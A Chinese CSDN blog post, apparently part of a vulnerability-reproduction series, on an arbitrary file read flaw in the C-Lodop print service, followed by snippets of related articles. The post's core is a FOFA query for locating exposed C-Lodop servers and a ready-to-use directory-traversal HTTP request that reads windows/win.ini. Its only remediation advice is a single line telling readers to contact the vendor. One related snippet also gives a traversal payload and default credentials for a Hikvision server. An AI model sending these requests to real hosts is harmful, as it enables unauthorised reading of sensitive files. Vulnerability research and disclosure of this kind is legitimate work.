【漏洞复现】C-Lodop云服务任意文件读取漏洞

最新推荐文章于 2024-06-25 14:46:03 发布
最新推荐文章于 2024-06-25 14:46:03 发布
阅读量1.5k 收藏 8
点赞数 13
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135925747
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

 Nx01 产品简介

        泰安梦泰尔软件有限公司经营范围包括:软件开发、信息技术咨询服务、信息系统集成服务、计算机、软件及辅助设备批发等。

Nx02 漏洞描述

        泰安梦泰尔软件有限公司C-Lodop打印服务系统存在文件读取漏洞,攻击者可利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: "C-Lodop" && icon_hash="-329747115"

Nx04 漏洞复现

POC:

GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 13
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

C-Lodop打印服务系统存在任意文件读取
weixin_43567873的博客
03-08 886
C-Lodop打印服务系统存在任意文件读取
用友GRP A++Cloud 政府财务云 任意文件读取漏洞复现(XVE-2024-10490)
0xSec
05-07 698
用友GRP A++Cloud 政府财务云 /ma/emp/maEmp/download接口存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
C-Lodop云打印服务系统存在任意文件读取漏洞
三天不打上房揭瓦的博客
07-01 8571
目录漏洞概述影响版本漏洞复现漏洞修复 漏洞概述 C-Lodop云打印服务器是一款非常好用且受欢迎的专业云打印软件,很实用,易操作简单,安装之后可以接收本地或者其他客户端浏览器的远程打印任务了,使用起来简单方便。 影响版本 不详。 漏洞复现 1、访问C-Lodop云打印服务器web页面。 2、burp抓包,输入命令文件路径,如图显示hosts文件内容。 漏洞修复 1、升级最新版本。 ...
[渗透测试] 任意文件读取漏洞
最新发布
Da1NtY的博客
06-25 881
使用filepath传递,在filepath中输入地址来获取文件内容。​ php.ini配置文件中,限定文件访问范围。不能有文件包含漏洞,目录遍历漏洞或者其他漏洞。使用str_replace进行替换。让用户只能访问一定的路径。
clodop(4.0.8.8版本) 任意文件访问漏洞
XiaoXiao_RenHe的专栏
03-10 3297
clodop(4.0.8.8)版本,任意文件访问漏洞复现及猜测
任意文件读取及删除漏洞
weixin_45007073的博客
02-02 3301
任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件任意文件读取漏洞,是web安全里高危的漏洞,它可以泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。 文件读取常见的函数 fopen file_get_contents fread fgets fgetss file fpassthru parse_ini_file readfile
c-lodop.zip,C-Lodop云打印服务器官方版是一款十分出色的云打印软件
10-13
2. **跨平台支持**:由于C-Lodop设计为云服务,因此它支持多种操作系统,包括Windows、Linux、Mac OS等,用户无论使用何种设备,只要能接入互联网,都可以进行打印操作。 3. **多设备兼容**:C-Lodop能够与各种类型...
打印Js生成的条形码和二维码(Lodop、C-Lodop组件)
02-13
打印Js生成的条形码和二维码(Lodop、C-Lodop组件) Web打印控件 报表打印工具 条码打印工具 图表打印工具
云打印C-Lodop技术手册3.008(20170901)
08-27
C-Lodop标准版的(32位)安装文件: - 4 - 安装后的运行文件: - 4 - 安装后的窗口 - 5 - 安装后的欢迎页面 - 6 - 三、页面调用 - 7 - 加载云打印JS文件的简单方法 - 7 - 动态加载云打印JS文件 - 7 - 云打印JS文件的...
C-Lodop打印demo
03-27
下面我们将详细介绍C-Lodop的核心功能以及压缩包内的各个文件。 首先,C-Lodop是一个JavaScript对象,它可以嵌入到网页中,实现跨浏览器、跨平台的打印功能。其主要优点在于能够处理HTML、图片、PDF等多样化的打印...
云打印C-Lodop技术手册
09-12
《云打印C-Lodop技术手册》是一本详细介绍如何利用C-Lodop进行云端打印操作的技术文档。C-Lodop,全称为Cloud Lodop,是一款高效便捷的云打印解决方案,尤其适用于小票、箱贴、财务单等各类文档的远程打印需求。其...
任意文件读取漏洞复现(CVE-2021-14544)
FODKING的博客
11-22 2910
海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544) 实验工具:burpsuite fodo 实验流程: 实现条件用fodo搜索用海康威视流媒体管理服务器的web端 1.发现它是弱口令直接用弱口令登录 admin 12345 就离谱 发现这应该是一个刚建立的不用的服务器 2.在日志文件中下载一个文件 3.用抓包软件抓取数据包 构建pyload …/…/…/…/…/…/…/windows/system32/drivers/etc/slt 4.发现数据包中存在任意
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 1792
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
任意文件读取漏洞详解
一个努力学习网安的小牛马
11-14 483
任意文件读取漏洞详解
支持APP的打印服务器,C-Lodop云打印服务器
weixin_42162216的博客
07-29 727
C-Lodop云打印服务器是一款云打印软件,安装之后可以接收本地或者其他客户端浏览器的远程打印任务了,而且它可以免登陆使用,在使用过程中可以调试窗口,体验AO打印机在内的扩展服务。软件特色1、支持https协议2、同时支持32位和64位系统3、支持AO打印机4、支持所有浏览器5、兼顾局域网和广域网打印功能介绍1、WebSocket通讯,速度快,堪比本地进程功能;2、由于支持全部Lodop语法,所以...
POC+++++++
ITgougou_的博客
11-24 1139
POC如下 # coding:utf-8 import requests from lib.core.common import url_handle,get_random_ua from lib.core.poc import POCBase # ... import urllib3 urllib3.disable_warnings() class POC(POCBase): _info = { "author" : "jijue", .
任意文件读取漏洞复现
来日可期的博客
08-31 3388
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
任意文件读取漏洞复现
weixin_58954236的博客
09-02 4420
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
lodop直接打印服务器的文件,C-Lodop云打印服务器
05-19
Lodop是一款常用的JavaScript打印控件,可以在浏览器端直接打印文件。但是,如果需要在服务器端直接打印文件,需要使用C-Lodop云打印服务器。 C-Lodop云打印服务器是一款基于云端的打印解决方案,可以通过其提供的API接口实现服务器端的文件打印。您可以上传需要打印的文件到C-Lodop云打印服务器,然后通过API接口指定打印任务,C-Lodop云打印服务器会将任务发送到指定的打印机进行打印。 C-Lodop云打印服务器支持多种打印方式,包括网页打印、PDF打印、图片打印等,可以满足不同的打印需求。同时,C-Lodop云打印服务器还提供了丰富的打印设置选项,例如纸张大小、打印方向、打印质量等,可以满足不同的打印要求。 需要注意的是,使用C-Lodop云打印服务器需要注册账号并购买相应的服务,具体详情可以参考C-Lodop云打印服务器官网。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值